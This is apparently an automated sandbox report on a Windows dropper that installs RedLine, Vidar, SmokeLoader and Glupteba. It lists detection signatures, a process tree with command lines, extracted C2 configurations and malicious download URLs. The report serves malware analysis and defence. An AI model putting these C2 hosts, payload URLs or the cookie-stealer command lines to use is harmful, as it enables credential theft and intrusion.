Joe Sandbox Cloud Basic Analysis Report
Create Interactive Tour

Windows Analysis Report yevbZfdCqR.exe

Overview

General Information

Sample Name:yevbZfdCqR.exe
Analysis ID:439281
MD5:3568d61a49b61ce18bd6093748ffd32a
SHA1:0f6c4618eb4fca4972869a56bf6d8b020e1440f8
SHA256:af350212764e6304bf417e81cf0009b494119670e4bc1b187cd79cf4c487c7b6
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

Glupteba RedLine SmokeLoader Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
DLL reload attack detected
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Glupteba
Yara detected RedLine Stealer
Yara detected SmokeLoader
Yara detected Vidar stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
Allocates memory in foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates HTML files with .exe extension (expired dropper behavior)
Disable Windows Defender real time protection (registry)
Drops PE files to the document folder of the user
Found C&C like URL pattern
Found Tor onion address
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
May check the online IP address of the machine
May modify the system service descriptor table (often done to hook functions)
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Renames NTDLL to bypass HIPS
Sets debug register (to hijack the execution of another thread)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Antivirus or Machine Learning detection for unpacked file
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • yevbZfdCqR.exe (PID: 6872 cmdline: 'C:\Users\user\Desktop\yevbZfdCqR.exe' MD5: 3568D61A49B61CE18BD6093748FFD32A)
    • 9PWySv_SmMZ5POEp2PUJ_lbI.exe (PID: 6000 cmdline: 'C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe' MD5: 9E78E5805208ADE76F61A62A8E42D763)
    • ZteJ0k9a2sM9jXcC3SndaipD.exe (PID: 5988 cmdline: 'C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe' MD5: A4663FF564689BA0EFB19D8D82AA044F)
    • YX7wpjoMI0vZoMwVbFh9XNIC.exe (PID: 4240 cmdline: 'C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe' MD5: 643397C445A8CED70CB110E7720C491D)
      • conhost.exe (PID: 64 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • YX7wpjoMI0vZoMwVbFh9XNIC.exe (PID: 7008 cmdline: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe MD5: 643397C445A8CED70CB110E7720C491D)
    • MQ5u6_H0cs9EUXsesfNpGUNc.exe (PID: 6588 cmdline: 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe' MD5: DF518E39A56E4EA23D0B2442FFD42AEE)
      • MQ5u6_H0cs9EUXsesfNpGUNc.exe (PID: 6224 cmdline: 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe' MD5: DF518E39A56E4EA23D0B2442FFD42AEE)
    • awTgWtFfNpBsevxQFHzT446w.exe (PID: 6300 cmdline: 'C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe' MD5: F517276868E5C46A449A5F73603B4E6A)
    • ulVElw2mPS2j3QKCM9gOxM3j.exe (PID: 6296 cmdline: 'C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe' MD5: 856CF6ED735093F5FE523F0D99E18424)
    • Xl5_fidIgZFRU48uwkdfjZGj.exe (PID: 4940 cmdline: 'C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe' MD5: 41C69A7F93FBE7EDC44FD1B09795FA67)
      • conhost.exe (PID: 6252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 4420 cmdline: 'C:\Windows\system32\rUNdlL32.eXe' 'C:\Users\user\AppData\Local\Temp\axhub.dll',axhub MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • oO2a8x5RXTHKygCXkT7syx3J.exe (PID: 6716 cmdline: 'C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe' MD5: 3FA93FEB10F08753F207064325EE1274)
    • gUlDp5No64Xfcgfbo3IlvG0y.exe (PID: 6768 cmdline: 'C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe' MD5: F85B88D232A348BF82B2B553F50DFBB8)
    • LPBuRcBvc7urPUzoi5RqTFtn.exe (PID: 4780 cmdline: 'C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe' MD5: AED57D50123897B0012C35EF5DEC4184)
      • jfiag3g_gg.exe (PID: 6944 cmdline: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt MD5: 7FEE8223D6E4F82D6CD115A28F0B6D58)
      • jfiag3g_gg.exe (PID: 5048 cmdline: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt MD5: A6279EC92FF948760CE53BBA817D6A77)
    • M5uLwz0sXvZcR89u_43Nm9v8.exe (PID: 1372 cmdline: 'C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe' MD5: 623C88CC55A2DF1115600910BBE14457)
      • file4.exe (PID: 7036 cmdline: 'C:\Program Files (x86)\Company\NewProduct\file4.exe' MD5: 02580709C0E95ABA9FDD1FBDF7C348E9)
      • jooyu.exe (PID: 4112 cmdline: 'C:\Program Files (x86)\Company\NewProduct\jooyu.exe' MD5: AED57D50123897B0012C35EF5DEC4184)
        • jfiag3g_gg.exe (PID: 4652 cmdline: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt MD5: A6279EC92FF948760CE53BBA817D6A77)
        • jfiag3g_gg.exe (PID: 4660 cmdline: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt MD5: A6279EC92FF948760CE53BBA817D6A77)
      • jingzhang.exe (PID: 6984 cmdline: 'C:\Program Files (x86)\Company\NewProduct\jingzhang.exe' MD5: A4C547CFAC944AD816EDF7C54BB58C5C)
        • conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • md8_8eus.exe (PID: 5636 cmdline: 'C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe' MD5: 7A151DB96E506BD887E3FFA5AB81B1A5)
    • BqbASL8ovE3o_gRiKrvwENXN.exe (PID: 6248 cmdline: 'C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe' MD5: 663FDF847D6B11308415FF86EBFFC275)
    • 5hIw8OebGuR7XztS5WBp_Scm.exe (PID: 6424 cmdline: 'C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe' MD5: E517017DD8609B293C5ADB489BE918FD)
      • NVdpapR9v21C.exe (PID: 4768 cmdline: 'C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe' MD5: BB4FD26AB95CB6D7EB25F95AC1F3C2DA)
      • Browzar.exe (PID: 5616 cmdline: 'C:\Program Files (x86)\Browzar\Browzar.exe' MD5: 847674F996283EB11F244A75F14F69AB)
    • KyTQCmNmjazMZrvIWzjrSsQG.exe (PID: 6476 cmdline: 'C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe' MD5: EA57C9A4177B1022EC4D053AF865CBC9)
    • gDoWsyv4ZlqhjBKjyfkjR1BY.exe (PID: 6616 cmdline: 'C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe' MD5: FF5864B23CEF0169322395F961AF31E9)
  • svchost.exe (PID: 340 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: RedLine

{
  "C2 url": [
    "ahannnavod.xyz:80"
  ],
  "Bot Id": "7500"
}

Threatname: Vidar

{
  "C2 url": "api.faceit.com/core/v1/nicknames/"
}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000025.00000000.966814169.000001DA29CD0000.00000040.00000001.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x6546e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000010.00000003.679617471.00000000020C0000.00000004.00000001.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x287e0:$xo1: cATGBBO\x01\x1B\x1E
00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    00000010.00000000.840587926.0000000000400000.00000040.00020000.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0x295e0:$xo1: cATGBBO\x01\x1B\x1E
    00000010.00000000.753598266.0000000000400000.00000040.00020000.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0x295e0:$xo1: cATGBBO\x01\x1B\x1E
    Click to see the 39 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    16.3.BqbASL8ovE3o_gRiKrvwENXN.exe.20c0000.0.unpackSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0x279e0:$xo1: cATGBBO\x01\x1B\x1E
    16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.12.raw.unpackSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0x295e0:$xo1: cATGBBO\x01\x1B\x1E
    16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.28.unpackSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0x279e0:$xo1: cATGBBO\x01\x1B\x1E
    16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.11.raw.unpackSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0x287e0:$xo1: cATGBBO\x01\x1B\x1E
    5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      Click to see the 52 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      • AV Detection
      • Cryptography
      • Bitcoin Miner
      • Compliance
      • Spreading
      • Software Vulnerabilities
      • Networking
      • Key, Mouse, Clipboard, Microphone and Screen Capturing
      • E-Banking Fraud
      • System Summary
      • Data Obfuscation
      • Persistence and Installation Behavior
      • Boot Survival
      • Hooking and other Techniques for Hiding and Protection
      • Malware Analysis System Evasion
      • Anti Debugging
      • HIPS / PFW / Operating System Protection Evasion
      • Language, Device and Operating System Detection
      • Lowering of HIPS / PFW / Operating System Security Settings
      • Stealing of Sensitive Information
      • Remote Access Functionality

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for URL or domain
      Source: http://136.144.41.133/WW/file8.exeAvira URL Cloud: Label: malware
      Source: http://marsdevelopmentsftwr.com/data/data.7zAvira URL Cloud: Label: malware
      Source: http://136.144.41.133/WW/file4.exeAvira URL Cloud: Label: malware
      Antivirus detection for dropped file
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exeAvira: detection malicious, Label: TR/AD.JazoStealer.znvpf
      Source: C:\Program Files (x86)\Company\NewProduct\file4.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeAvira: detection malicious, Label: HEUR/AGEN.1114952
      Found malware configuration
      Source: 6.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.407d438.1.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["ahannnavod.xyz:80"], "Bot Id": "7500"}
      Source: 5.3.ZteJ0k9a2sM9jXcC3SndaipD.exe.2620000.0.raw.unpackMalware Configuration Extractor: Vidar {"C2 url": "api.faceit.com/core/v1/nicknames/"}
      Multi AV Scanner detection for domain / URL
      Source: nicepricingsaleregistration.comVirustotal: Detection: 6%Perma Link
      Source: jom.diregame.liveVirustotal: Detection: 7%Perma Link
      Multi AV Scanner detection for dropped file
      Source: C:\Program Files (x86)\Company\NewProduct\file4.exeMetadefender: Detection: 15%Perma Link
      Source: C:\Program Files (x86)\Company\NewProduct\file4.exeReversingLabs: Detection: 78%
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exeMetadefender: Detection: 25%Perma Link
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exeReversingLabs: Detection: 79%
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exeMetadefender: Detection: 41%Perma Link
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exeReversingLabs: Detection: 89%
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeMetadefender: Detection: 34%Perma Link
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeReversingLabs: Detection: 93%
      Multi AV Scanner detection for submitted file
      Source: yevbZfdCqR.exeVirustotal: Detection: 67%Perma Link
      Source: yevbZfdCqR.exeMetadefender: Detection: 25%Perma Link
      Source: yevbZfdCqR.exeReversingLabs: Detection: 68%
      Yara detected Glupteba
      Source: Yara matchFile source: Process Memory Space: KyTQCmNmjazMZrvIWzjrSsQG.exe PID: 6476, type: MEMORY
      Source: Yara matchFile source: 19.3.KyTQCmNmjazMZrvIWzjrSsQG.exe.37e0000.0.unpack, type: UNPACKEDPE
      Machine Learning detection for dropped file
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Company\NewProduct\file4.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeJoe Sandbox ML: detected
      Source: 41.0.jfiag3g_gg.exe.400000.0.unpackAvira: Label: TR/Crypt.ULPM.Gen
      Source: 1.3.yevbZfdCqR.exe.5bc4e20.12.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 1.3.yevbZfdCqR.exe.5b28ec0.54.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 1.3.yevbZfdCqR.exe.5bc4e20.2.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.2580e50.3.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 26.2.jooyu.exe.390000.0.unpackAvira: Label: TR/Redcap.ahesa
      Source: 26.2.jooyu.exe.40f110.2.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 41.2.jfiag3g_gg.exe.400000.0.unpackAvira: Label: TR/Crypt.ULPM.Gen
      Source: 13.0.LPBuRcBvc7urPUzoi5RqTFtn.exe.c6f110.2.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 13.2.LPBuRcBvc7urPUzoi5RqTFtn.exe.c6f110.7.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 1.3.yevbZfdCqR.exe.4f393c3.7.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 13.0.LPBuRcBvc7urPUzoi5RqTFtn.exe.bf0000.0.unpackAvira: Label: TR/Redcap.ahesa
      Source: 13.0.LPBuRcBvc7urPUzoi5RqTFtn.exe.c9d110.3.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 33.0.jfiag3g_gg.exe.400000.0.unpackAvira: Label: TR/Crypt.ULPM.Gen
      Source: 26.0.jooyu.exe.40f110.1.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 1.3.yevbZfdCqR.exe.5b65d60.13.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 36.0.jfiag3g_gg.exe.400000.0.unpackAvira: Label: TR/Crypt.ULPM.Gen
      Source: 36.2.jfiag3g_gg.exe.400000.0.unpackAvira: Label: TR/Crypt.ULPM.Gen
      Source: 25.2.file4.exe.6e0000.2.unpackAvira: Label: TR/Patched.Ren.Gen2
      Source: 20.2.gDoWsyv4ZlqhjBKjyfkjR1BY.exe.41bf9a.3.unpackAvira: Label: TR/Dropper.Gen
      Source: 1.3.yevbZfdCqR.exe.5b02020.5.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 25.2.file4.exe.6f0000.4.unpackAvira: Label: TR/Dropper.Gen
      Source: 1.3.yevbZfdCqR.exe.5aeefe0.17.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 37.0.svchost.exe.1da29cd0000.4.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 5.3.ZteJ0k9a2sM9jXcC3SndaipD.exe.2620000.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 26.2.jooyu.exe.43d110.1.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 26.0.jooyu.exe.390000.0.unpackAvira: Label: TR/Redcap.ahesa
      Source: 1.3.yevbZfdCqR.exe.5e52f40.20.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 11.3.oO2a8x5RXTHKygCXkT7syx3J.exe.2670000.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 33.2.jfiag3g_gg.exe.400000.0.unpackAvira: Label: TR/Crypt.ULPM.Gen
      Source: 20.2.gDoWsyv4ZlqhjBKjyfkjR1BY.exe.421b96.1.unpackAvira: Label: TR/Dropper.Gen
      Source: 13.2.LPBuRcBvc7urPUzoi5RqTFtn.exe.bf0000.6.unpackAvira: Label: TR/Redcap.ahesa
      Source: 13.2.LPBuRcBvc7urPUzoi5RqTFtn.exe.c9d110.9.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 26.0.jooyu.exe.43d110.2.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0125E700 CryptGenRandom,CryptReleaseContext,__Init_thread_footer,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0125DFC0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,CryptAcquireContextA,___std_exception_copy,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0125E120 CryptAcquireContextA,GetLastError,CryptReleaseContext,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_012A3130 CryptReleaseContext,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0040EBC3 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0040E9C8 _memset,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0040EB60 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0040ECDA _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,

      Bitcoin Miner:

      barindex
      Yara detected Glupteba
      Source: Yara matchFile source: Process Memory Space: KyTQCmNmjazMZrvIWzjrSsQG.exe PID: 6476, type: MEMORY
      Source: Yara matchFile source: 19.3.KyTQCmNmjazMZrvIWzjrSsQG.exe.37e0000.0.unpack, type: UNPACKEDPE

      Compliance:

      barindex
      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeUnpacked PE file: 4.2.9PWySv_SmMZ5POEp2PUJ_lbI.exe.400000.0.unpack
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeUnpacked PE file: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.400000.0.unpack
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeUnpacked PE file: 9.2.ulVElw2mPS2j3QKCM9gOxM3j.exe.400000.0.unpack
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeUnpacked PE file: 11.2.oO2a8x5RXTHKygCXkT7syx3J.exe.400000.0.unpack
      Source: yevbZfdCqR.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
      Source: unknownHTTPS traffic detected: 104.21.65.45:443 -> 192.168.2.4:49753 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.59.252:443 -> 192.168.2.4:49769 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 157.240.17.35:443 -> 192.168.2.4:49795 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 74.114.154.22:443 -> 192.168.2.4:49796 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 74.114.154.22:443 -> 192.168.2.4:49808 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.4:49812 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 157.240.17.35:443 -> 192.168.2.4:49813 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.4:49815 version: TLS 1.2
      Source: yevbZfdCqR.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: C:\Users\Admin\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: c:\src\ShellRunas\Release\ShellRunas.pdb source: file4.exe, 00000019.00000000.703183273.000000000040D000.00000002.00020000.sdmp
      Source: Binary string: c:\Development\Releases\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: M5uLwz0sXvZcR89u_43Nm9v8.exe, 0000000E.00000003.701416962.00000000027B3000.00000004.00000001.sdmp
      Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: _.pdb source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000003.731578299.00000000051A0000.00000004.00000001.sdmp
      Source: Binary string: C:\haguxu-7\gafoyeyi\23 cevecovad-kaciw25\tedibuxiyal.pdb source: ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000002.967043402.00000000004A9000.00000002.00020000.sdmp
      Source: Binary string: symsrv.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.984582000.00000000040A0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: UnpackChrome.pdb source: ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000003.731578299.00000000051A0000.00000004.00000001.sdmp
      Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: vcruntime140.i386.pdbGCTL source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1033144305.0000000002434000.00000004.00000001.sdmp
      Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: espexe.pdb source: file4.exe, 00000019.00000002.737119021.00000000006E0000.00000040.00000001.sdmp
      Source: Binary string: symsrv.pdbGCTL source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.984582000.00000000040A0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: <c:\src\ShellRunas\Release\ShellRunas.pdb source: file4.exe, 00000019.00000000.703183273.000000000040D000.00000002.00020000.sdmp
      Source: Binary string: EfiGuardDxe.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: dbghelp.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: dbghelp.pdbGCTL source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: Loader.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
